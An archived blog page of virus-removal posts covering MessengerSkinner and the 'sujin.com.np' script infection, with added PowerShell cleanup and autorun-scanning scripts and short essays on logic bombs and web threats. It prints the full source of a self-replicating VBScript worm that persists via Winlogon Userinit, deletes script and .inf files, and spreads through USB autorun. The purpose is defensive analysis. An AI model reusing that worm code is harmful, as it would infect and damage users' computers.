CRAZE4TECH: Virus/Antivirus
Showing posts with label Virus/Antivirus.

Thursday, May 1, 2008

How to remove messengerskinner.exe?

MessengerSkinner.exe is part of the MessengerSkinner software. MessengerSkinner is a potentially unwanted application that may drop a copy of Trojan.Skintrim onto the computer, and it may also display pop-up advertisements. Here is the full process for removing it.

1. Temporarily disable System Restore (Windows Me/XP), otherwise the cleaned files can be restored from a restore point.
2. Update the virus definitions.
3. Uninstall Messenger Skinner:
a) Click Start > Settings > Control Panel or Start > Control Panel (this varies with the operating system).
b) In the Control Panel window, double-click Add/Remove Programs.
c) Click Messenger Skinner to select it.
d) Click Add/Remove, Change/Remove, or Remove (this varies with the operating system) and follow the prompts.

4. Reboot the computer in Safe Mode.
5. Run a full system scan and clean or delete all infected files.
6. Delete or modify the values added to the registry. Export each key first (File > Export in Regedit) so you can put it back if you remove the wrong thing.
Navigate to and delete the following registry values:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"[RANDOM CHARACTERS]" = "c:\documents and settings\administrator\local settings\application data\[RANDOM CHARACTERS].exe [RANDOM CHARACTERS]"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"messengerskinner" = "C:\Program Files\MessengerSkinner\MessengerSkinner.exe"
(The profile folder in the first path belongs to the account that was logged on when the software was installed; if that was not "administrator", look for that user's profile folder instead. The value name is random, so match it by the command it points to.)

Navigate to and delete the following registry subkeys:
HKEY_CURRENT_USER\Software\LanConfig
HKEY_CURRENT_USER\Software\MessengerSkinner
HKEY_LOCAL_MACHINE\SOFTWARE\MessengerSkinner
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MessengerSkinner
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\[RANDOM CHARACTERS]

7. Exit the Registry Editor and restart the computer.

8. To make sure the threat is completely eliminated, carry out a full scan of your computer with up-to-date antivirus and antispyware software. You can also try an online virus scanner, which doesn't need any installation.
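The registry part of this procedure (step 6) can be scripted so that nothing has to be deleted by hand in Regedit. The PowerShell below is an added example and not part of the original post: it removes the Run values and subkeys listed above, and because the two "[RANDOM CHARACTERS]" entries cannot be named in advance it matches them by pattern instead (the random Run value by a command line pointing at an .exe directly under Local Settings\Application Data, the random Uninstall key by a DisplayName or UninstallString that mentions MessengerSkinner). Those patterns and the XP-style profile layout they assume are my assumptions, not something the post states. Run it from an elevated prompt in Safe Mode, and run it with -WhatIf first to see what it would remove.

```powershell
<#
  Added example, not part of the original post: step 6 (registry cleanup)
  scripted with PowerShell. Run elevated, in Safe Mode, after the uninstall
  and the scan; run with -WhatIf first. The "[RANDOM CHARACTERS]" entries
  are matched by pattern; the patterns are assumptions, not from the post.
#>
[CmdletBinding(SupportsShouldProcess)]
param()

$runKey     = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$knownValue = 'messengerskinner'
# Random-named Run value: its data is a random .exe directly under
# "...\Local Settings\Application Data\" (no subfolder), as listed in the post.
$suspectData = '(?i)\\local settings\\application data\\[^\\"]+\.exe'

$subkeys = @(
    'HKCU:\Software\LanConfig'
    'HKCU:\Software\MessengerSkinner'
    'HKLM:\SOFTWARE\MessengerSkinner'
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MessengerSkinner'
)

# Run values. Copy the names first so the key is not enumerated while
# values are being deleted from it.
if (Test-Path -Path $runKey) {
    $run = Get-Item -Path $runKey
    foreach ($name in @($run.GetValueNames())) {
        if ($name -eq '') { continue }          # skip the (Default) value
        $data = [string]$run.GetValue($name)
        if ($name -ieq $knownValue -or $data -match $suspectData) {
            Write-Verbose "Run value '$name' = $data"
            Remove-ItemProperty -Path $runKey -Name $name
        }
    }
}

# Product subkeys listed in the post.
foreach ($key in $subkeys) {
    if (Test-Path -Path $key) {
        Remove-Item -Path $key -Recurse
    }
}

# Uninstall\[RANDOM CHARACTERS]: find it by what it describes, not by name.
$uninstall = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall'
foreach ($entry in Get-ChildItem -Path $uninstall) {
    $props = Get-ItemProperty -Path $entry.PSPath
    $text  = "$($props.DisplayName) $($props.UninstallString)"
    if ($text -match '(?i)messenger\s*skinner') {
        Write-Verbose "Uninstall entry $($entry.PSChildName): $text"
        Remove-Item -Path $entry.PSPath -Recurse
    }
}
```

Save it as, say, Clean-MessengerSkinner.ps1 and run `.\Clean-MessengerSkinner.ps1 -WhatIf -Verbose` first; every Remove-Item and Remove-ItemProperty honours -WhatIf through the script's SupportsShouldProcess, so you see the exact values and keys before anything is deleted. The pattern match on the Run value is deliberately narrow (an .exe directly in Application Data, no subfolder) to avoid catching legitimate per-user updaters that live in subfolders there.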

Wednesday, December 12, 2007

The solutions for ‘sujin.com.np’ virus

Just a few days ago I wrote about this virus that changes the home page of Internet Explorer to ‘sujin.com.np’ and makes some other changes in the registry. Well, I encountered this so-called virus myself and also found its solution through various resources. To remove this virus you can follow the process below:

1. From the Start menu click ‘Run’ and type ‘Regedit’.

2. Registry Editor will open.

3. In the Registry Editor, open the Edit menu and click Find.

4. In the Find dialog box type virusremoval.vbs and click Find Next.

5. The search will stop at the value named "Userinit" (under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon). Double-click it; you will find several commands separated by commas, e.g. C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\wscript.exe C:\WINDOWS\system32\VirusRemoval.vbs. Delete the whole entry that launches the script, i.e. the wscript.exe command together with the VirusRemoval.vbs path, not just the .vbs path, or you are left with a dangling wscript.exe entry. Make sure the remaining entries are unaltered: C:\WINDOWS\system32\userinit.exe must stay, otherwise Windows logs you straight back out after logon.

6. Press F3 (Find Next) to see if the same path exists somewhere else in your registry. If it is found again at some other place, remove the path there as well.

7. Repeat F3 until you get a message that the search has finished.

8. Change your home page back to your usual one. You will notice that although your home page has stopped changing back to ‘sujin.com.np’, your title bar still shows ‘sujin.com.np’.

9. To change this back to normal, first change your home page, then open the Registry Editor again, click Find in the Edit menu and type sujin.com.np without quotes. You will find the value "Window Title" (under Software\Microsoft\Internet Explorer\Main). Double-click it and type "Windows Internet Explorer" or any other text you would like to have in the title bar; deleting the value altogether also works and restores the default title. Please note that you have to change the value in two places. Press F3 (Find Next) until you receive the message that the search has finished, to ensure that you have changed both.

Well, this is a pretty long procedure. Instead of doing all this you can download a scanner for this virus from http://worldlink.com.np/support/download/software/Scanner.exe and run a scan, and the virus will be removed easily. As with any executable downloaded to clean an infection, check that the download really comes from the site you expect and scan the file with your antivirus before running it.
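For anyone who prefers not to edit Userinit by hand, here is the same repair (steps 4 to 9, plus deletion of the dropped script files) as a PowerShell script. This is an added example, not part of the original post or the linked scanner: it assumes the Userinit entry has the exact form the VBScript in the earlier post writes ("<system32>\wscript.exe <system32>\VirusRemoval.vbs"), that the hijacked Internet Explorer values are "Window Title" and "Start Page" under Software\Microsoft\Internet Explorer\Main in HKCU and HKLM, and that the dropped copies sit in system32 and in the root of each drive. Run it from an elevated prompt, with -WhatIf first.

```powershell
<#
  Added example, not part of the original post: steps 4-9 of the procedure
  above done with PowerShell instead of Regedit, plus deletion of the
  dropped script files. Run elevated (Userinit lives in HKLM); run with
  -WhatIf first. Assumptions: the Userinit entry has the form the VBScript
  writes ("<system32>\wscript.exe <system32>\VirusRemoval.vbs"); the IE
  values are "Window Title" / "Start Page" under ...\Internet Explorer\Main.
#>
[CmdletBinding(SupportsShouldProcess)]
param()

$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$dropper  = '(?i)virusremoval\.vbs'

# Userinit is a comma-separated list of commands run at logon. The infected
# element is the whole "wscript.exe ...\VirusRemoval.vbs" command, so dropping
# only the .vbs path would leave a dangling wscript.exe. userinit.exe must
# survive: an empty or broken Userinit logs every user off immediately.
function Repair-UserinitValue {
    param(
        [string]$Current,
        [string]$SystemDir = "$env:SystemRoot\system32"
    )
    $keep = @($Current -split ',' |
              ForEach-Object { $_.Trim() } |
              Where-Object { $_ -ne '' -and $_ -notmatch $dropper })
    if (-not ($keep -match '(?i)\\userinit\.exe$')) {
        $keep = @("$SystemDir\userinit.exe") + $keep
    }
    # Windows stores the default with a trailing comma; keep that form.
    return ($keep -join ',') + ','
}

# Steps 4-7: repair Userinit.
$ui = (Get-ItemProperty -Path $winlogon -Name Userinit).Userinit
if ($ui -match $dropper) {
    $fixed = Repair-UserinitValue -Current $ui
    Write-Verbose "Userinit: '$ui' -> '$fixed'"
    Set-ItemProperty -Path $winlogon -Name Userinit -Value $fixed
}

# Steps 8-9: undo the IE hijack. Deleting "Window Title" restores the
# default title rather than writing a guessed string into it.
foreach ($hive in 'HKCU', 'HKLM') {
    $main = "$($hive):\Software\Microsoft\Internet Explorer\Main"
    if (-not (Test-Path -Path $main)) { continue }
    $p = Get-ItemProperty -Path $main
    if ($p.'Window Title' -match '(?i)sujin\.com\.np') {
        Remove-ItemProperty -Path $main -Name 'Window Title'
    }
    if ($p.'Start Page' -match '(?i)sujin\.com\.np') {
        Set-ItemProperty -Path $main -Name 'Start Page' -Value 'about:blank'
    }
}

# The dropped copies are written with every attribute bit set (read-only,
# hidden, system), so clear the attributes before deleting. Look in system32
# and in the root of every drive, which is where the script copies itself.
$targets = @("$env:SystemRoot\system32\VirusRemoval.vbs")
foreach ($d in Get-PSDrive -PSProvider FileSystem) {
    $targets += Join-Path $d.Root 'VirusRemoval.vbs'
}
foreach ($f in $targets) {
    if (-not (Test-Path -LiteralPath $f)) { continue }
    if ($PSCmdlet.ShouldProcess($f, 'Clear attributes and delete')) {
        (Get-Item -LiteralPath $f -Force).Attributes = 'Normal'
        Remove-Item -LiteralPath $f -Force
    }
}
```

Repair-UserinitValue is kept as a pure string function on purpose: you can paste a suspicious Userinit value into it and inspect the result before anything is written back, which matters because a mistake in that one value locks every account out of the machine. Get-Item needs -Force to see the hidden copies at all, and the attributes are reset before Remove-Item so the delete does not fail on the read-only bit.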

Wednesday, December 5, 2007

‘sujin.com.np’ virus or what?

It was just today that I noticed that whenever I opened Internet Explorer, the title of my browser showed ‘sujin.com.np’ and my home page had been changed to sujin.com.np. I was scared for a moment. What could have happened? Did someone hack into my browser and steal my private data? I have the free edition of AVG installed and I update it regularly, but it couldn’t detect the so-called ‘sujin.com.np’ virus.
Anyway, I knew that the only thing that could solve my problem was the internet, and as I predicted I found many solutions. Actually, this might have got onto my computer through someone’s flash drive or something. It was just a script, written by some guy from Nepal in Visual Basic, that changed some registry settings and copied itself to the root directory of all drives.
The VBS file, opened in Notepad, looked like this:
'******************************************************************
'********************* Virus Removal VBScript *********************
'************************** Version 1.00 **************************
'******************************************************************
'This antivirus program is intended to repair your computer from
'any sorts of virus attacks.
'This program is exactly like a normal virus but it repairs things
'rather than destroying them.
'******************************************************************
'******************************************************************
'Program developed by
'Sujin Joshi
'http://Sujin.com.np
'sujinjoshi@gmail.com
Option Explicit
On Error Resume Next    ' every error below is silently ignored

Dim Fso, Shells, SystemDir, WinDir, Count, File, Drv, Drives, InDrive, ReadAll, AllFile, WriteAll, Del, Chg, folder, files, Delete, auto, root

Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)      ' %WinDir%
Set SystemDir = Fso.GetSpecialFolder(1)   ' %WinDir%\system32
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv = File.Drive
Set InDrive = Fso.Drives

' Read the script's own source into AllFile; this is the copy written to
' system32 and to the drive roots below.
Set ReadAll = File.OpenAsTextStream(1, -2)
Do While Not ReadAll.AtEndOfStream
    AllFile = AllFile & ReadAll.ReadLine
    AllFile = AllFile & vbCrLf
Loop

' Type of the drive the script was started from (1 = removable, 2 = fixed).
' Unless started from removable media, the Do loop below repeats every
' 10 seconds for as long as the process lives.
Count = Drv.DriveType

Do
    ' Drop a copy into system32 and set every attribute bit (read-only, hidden, system, ...).
    If Not Fso.FileExists(SystemDir & "\VirusRemoval.vbs") Then
        Set WriteAll = Fso.CreateTextFile(SystemDir & "\VirusRemoval.vbs", 2, True)
        WriteAll.Write AllFile
        WriteAll.Close
        Set WriteAll = Fso.GetFile(SystemDir & "\VirusRemoval.vbs")
        WriteAll.Attributes = -1
    End If

    ' Registry: hijack the IE title and start page, write 0 to the Folder Options /
    ' Task Manager / Regedit policies (i.e. leave them enabled), restore the Shell
    ' value, and hook Userinit so wscript.exe runs the system32 copy at every logon.
    Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title", "Sujin.com.np"
    Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "0", "REG_DWORD"
    Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "0", "REG_DWORD"
    Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "0", "REG_DWORD"
    Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://sujin.com.np/"
    Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "explorer.exe"
    Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit", SystemDir & "\userinit.exe," & _
        SystemDir & "\wscript.exe " & SystemDir & "\VirusRemoval.vbs"

    For Each Drives In InDrive
        root = Drives.Path & "\"
        ' When started from a drive root (i.e. via autorun), open that drive in
        ' Explorer so the user sees what they expected to see.
        If Fso.GetParentFolderName(WScript.ScriptFullName) = root Then
            Shells.Run "explorer.exe " & root
        End If
        Set folder = Fso.GetFolder(root)
        Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs", True)
        ' Delete every file in the root whose name starts with "autorun".
        For Each files In folder.Files
            auto = Left(files.Name, 7)
            If UCase(auto) = UCase("autorun") Then
                Set Delete = Fso.DeleteFile(root & files.Name, True)
            End If
        Next
        If Drives.DriveType = 2 Then
            delext "inf", Drives.Path & "\"
            delext "INF", Drives.Path & "\"
        End If

        If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
            If Drives.Path <> "A:" Then
                ' Remove all other .vbs files in %WinDir% and in the drive root, then
                ' the launcher files of some other autorun worms.
                delext "vbs", WinDir & "\"
                delext "vbs", Drives.Path & "\"

                If Fso.FileExists(Drives.Path & "\ravmon.exe") Then
                    Fso.DeleteFile(Drives.Path & "\ravmon.exe")
                End If
                If Fso.FileExists(Drives.Path & "\sxs.exe") Then
                    Fso.DeleteFile(Drives.Path & "\sxs.exe")
                End If
                If Fso.FileExists(Drives.Path & "\winfile.exe") Then
                    Fso.DeleteFile(Drives.Path & "\winfile.exe")
                End If
                If Fso.FileExists(Drives.Path & "\run.wsh") Then
                    Fso.DeleteFile(Drives.Path & "\run.wsh")
                End If

                ' Removable drives only: drop a copy in the root and (re)write an
                ' autorun.inf that launches it with wscript.exe on insertion.
                If Drives.DriveType = 1 Then
                    If Drives.Path <> "A:" Then
                        If Not Fso.FileExists(Drives.Path & "\VirusRemoval.vbs") Then
                            Set WriteAll = Fso.CreateTextFile(Drives.Path & "\VirusRemoval.vbs", 2, True)
                            WriteAll.Write AllFile
                            WriteAll.Close
                            Set WriteAll = Fso.GetFile(Drives.Path & "\VirusRemoval.vbs")
                            WriteAll.Attributes = -1
                        End If

                        If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then
                            ' -8 clears the read-only, hidden and system bits so the
                            ' existing autorun.inf can be overwritten.
                            Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf")
                            Chg.Attributes = -8
                            Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf", 2, True)
                            WriteAll.WriteLine "[autorun]"
                            WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
                            WriteAll.WriteLine "shell\open=Open"
                            WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
                            WriteAll.Close
                            Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
                            WriteAll.Attributes = -1
                        Else
                            Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf", 2, True)
                            WriteAll.WriteLine "[autorun]"
                            WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
                            WriteAll.WriteLine "shell\open=Open"
                            WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
                            WriteAll.Close
                            Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
                            WriteAll.Attributes = -1
                        End If
                    End If
                End If
            End If
        End If
    Next

    If Count <> 1 Then
        WScript.Sleep 10000
    End If
Loop While Count <> 1

' Delete every file in SrchPath whose last three characters match File2Find,
' except the dropper itself.
Sub delext(File2Find, SrchPath)
    Dim oFileSys, oFolder, oFile, Cut, Delete
    Set oFileSys = CreateObject("Scripting.FileSystemObject")
    Set oFolder = oFileSys.GetFolder(SrchPath)
    For Each oFile In oFolder.Files
        Cut = Right(oFile.Name, 3)
        If UCase(Cut) = UCase(File2Find) Then
            If oFile.Name <> "VirusRemoval.vbs" Then Set Delete = oFileSys.DeleteFile(SrchPath & oFile.Name, True)
        End If
    Next
End Sub


A post on boyutal’s blog says that it’s just a harmless VBScript file installed on your computer which just:

1.) Modifies registry settings, such as disabling access to the taskbar, setting the start page of Internet Explorer to "sujin.com.np", and modifying the Userinit setting to execute VirusRemoval.vbs.

2.) Stores a copy of itself in the root directory of all drives.

3.) Removes all .vbs files in the Windows directory and the root directory, and all .inf files in the root directories of drives.

4.) Removes ravmon.exe, sxs.exe, winfile.exe and run.wsh. (Maybe these are files of some malware that its author wants to remove.)

5.) Stores VirusRemoval.vbs in the root and adds an autorun.inf to make sure that it executes automatically if it’s on a removable disk (i.e. a flash drive).

And that’s it... it’s harmless.

I don’t know, I still think there is something fishy about this.
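What the script relies on to spread is visible in items 2 and 5 above: a copy of itself in the root of every removable drive, with all attribute bits set so it is hidden, plus an autorun.inf whose open and shell\open\Command entries hand it to wscript.exe. Those are also the things worth looking for on any USB stick that has been near an infected machine. The PowerShell below is an added example, not part of the original post or of boyutal’s write-up: it is a read-only triage scan that parses the [autorun] section of each drive root’s autorun.inf and reports any launch entry that invokes a script host or script file, and lists hidden/system script files sitting in the root. The indicator patterns and function names are mine; the file names and autorun keys are the ones the script itself writes. It modifies nothing.

```powershell
<#
  Added example, not part of the original post: a read-only triage scan for
  the removable-media persistence the script above sets up. For every drive
  it reports a root autorun.inf whose open / shellexecute / shell\...\command
  entries invoke a script host, and any hidden or system script file in the
  drive root. Nothing is modified. Indicator patterns and function names are
  assumptions; the file names and autorun keys come from the script itself.
#>

# Script hosts and script extensions an autorun.inf has no business launching.
$ScriptHost = '(?i)\b[wc]script(\.exe)?\b|\.(vbs|vbe|js|jse|wsf|wsh)\b'

# Parse the [autorun] section into key -> value (keys lower-cased, so
# "shell\open\Command" and "shell\open\command" are the same entry).
function Get-AutorunCommands {
    param([string]$Text)
    $cmds = @{}
    $inSection = $false
    foreach ($line in ($Text -split "`r?`n")) {
        $l = $line.Trim()
        if ($l -match '^\[(.+)\]$') { $inSection = ($Matches[1] -ieq 'autorun'); continue }
        if ($inSection -and $l -match '^([^=;]+)=(.*)$') {
            $cmds[$Matches[1].Trim().ToLower()] = $Matches[2].Trim()
        }
    }
    return $cmds
}

function Test-DriveRoot {
    param([string]$Root)
    $findings = @()

    $inf = Join-Path $Root 'autorun.inf'
    if (Test-Path -LiteralPath $inf) {
        $cmds = Get-AutorunCommands -Text (Get-Content -LiteralPath $inf -Raw -Force)
        foreach ($k in $cmds.Keys) {
            $launches = ($k -in @('open', 'shellexecute')) -or ($k -like 'shell\*command')
            if ($launches -and $cmds[$k] -match $ScriptHost) {
                $findings += "$inf : $k=$($cmds[$k])"
            }
        }
    }

    # The dropper sets every attribute bit, so a hidden+system script in the
    # root is a strong indicator; Get-ChildItem needs -Force to see it at all.
    $hiddenSystem = [IO.FileAttributes]'Hidden, System'
    foreach ($file in Get-ChildItem -LiteralPath $Root -File -Force -ErrorAction SilentlyContinue) {
        if ($file.Extension -match '^\.(vbs|vbe|wsf|wsh)$' -and ($file.Attributes -band $hiddenSystem)) {
            $findings += "$($file.FullName) : $($file.Attributes)"
        }
    }
    return $findings
}

$report = @()
foreach ($drive in Get-PSDrive -PSProvider FileSystem) {
    $report += @(Test-DriveRoot -Root $drive.Root)
}
if ($report.Count) { $report } else { 'No autorun indicators found.' }
```

Running it with the infected stick plugged in prints two lines for that drive: the open= and shell\open\command= entries pointing at wscript.exe VirusRemoval.vbs, and the hidden/system VirusRemoval.vbs itself. Because the parser looks at what the .inf would actually launch rather than at the file name, it also catches the same trick with a different script name, which is the usual way these things come back.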

Sunday, October 7, 2007

Logic Bomb

One of the oldest types of program threat, predating viruses and worms, is the logic bomb: code embedded in a legitimate program that is set to ‘explode’ when certain conditions are met. Examples of trigger conditions are the presence or absence of certain files, a particular day of the week or date, or a particular user running the application. Once triggered, a bomb may alter or delete data or files, halt the machine, or do other damage. A striking example of how logic bombs can be employed is the case of Tim Lloyd, who was convicted of planting a logic bomb that cost his employer, Omega Engineering, more than $10 million, derailed its corporate growth strategy, and eventually led to the layoff of 80 workers [GAUD00]. Lloyd was sentenced to 41 months in prison and ordered to pay $2 million in restitution.

Tuesday, June 5, 2007

Web pages itself are more dangerous than viruses

In the early days, when Web pages were just static HTML files, they contained no executable code. Now they often contain small programs: Java applets, ActiveX controls and JavaScript. Downloading and executing such mobile code is obviously a large security risk. Over the next few days I’ll be writing more about applets, ActiveX controls and JavaScript, so please bear with me.

Java applets are small Java programs compiled to bytecode for a stack-oriented virtual machine, the JVM (Java Virtual Machine). They can be placed on a Web page for downloading along with the page. After the page is loaded, the applets are run by a JVM interpreter inside the browser.

When an applet tries to use a system resource, its call is passed to a security monitor (Java’s security manager) for approval. The monitor examines the call in light of the local security policy and decides whether to allow or reject it. In this way it is possible to give applets access to some resources but not others. Unfortunately, in practice this security model has worked badly, and bugs in it crop up all the time.

Tuesday, April 10, 2007

Internet threats

The internet is everywhere now, and the threats that come with it are just as widespread. People who are very good at programming and understand computer systems and networking well may use that knowledge to break into other people’s computers or to spread worms, viruses, Trojan horses and the like. Because the internet links computers all over the world in a single network, anyone anywhere can reach any computer connected to it, which makes an attacker’s job much easier. The most common internet threats we come across in daily life are hacking (unauthorized entry into and use of a computer system) and computer viruses and worms.

One thing users can do to protect themselves from such threats is to use a firewall and update their antivirus software regularly. Firewalls and up-to-date antivirus software won’t make your system completely immune to such threats, but they do protect it to a certain extent. Users should also be careful about which sites they visit and which links they click.